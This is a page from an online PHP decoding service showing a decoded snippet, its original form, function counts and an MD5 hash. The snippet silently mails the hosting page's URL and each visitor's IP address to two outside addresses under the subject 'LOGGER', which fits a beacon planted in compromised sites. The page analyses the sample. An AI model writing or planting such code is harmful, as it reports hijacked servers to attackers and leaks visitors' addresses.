Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php @ini_set('output_buffering', 0); @ini_set('display_errors', 0); set_time_limit(0)..

Decoded Output download

<?php 
@ini_set('output_buffering', 0); 
@ini_set('display_errors', 0); 
set_time_limit(0); 
ini_set('memory_limit', '64M'); 
header('Content-Type: text/html; charset=UTF-8'); 
$tujuanmail = '[email protected], [email protected]'; 
$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI']; 
$pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]"; 
mail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]"); 
?>

Did this file decode correctly?

Original Code

<?php
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
$tujuanmail = '[email protected], [email protected]';
$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
mail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
?>

Function Calls

header 1
ini_set 3
set_time_limit 1

Variables

None

Stats

MD5 f6cf34a978569765f5e3e7f4cb2b8202
Eval Count 0
Decode Time 78 ms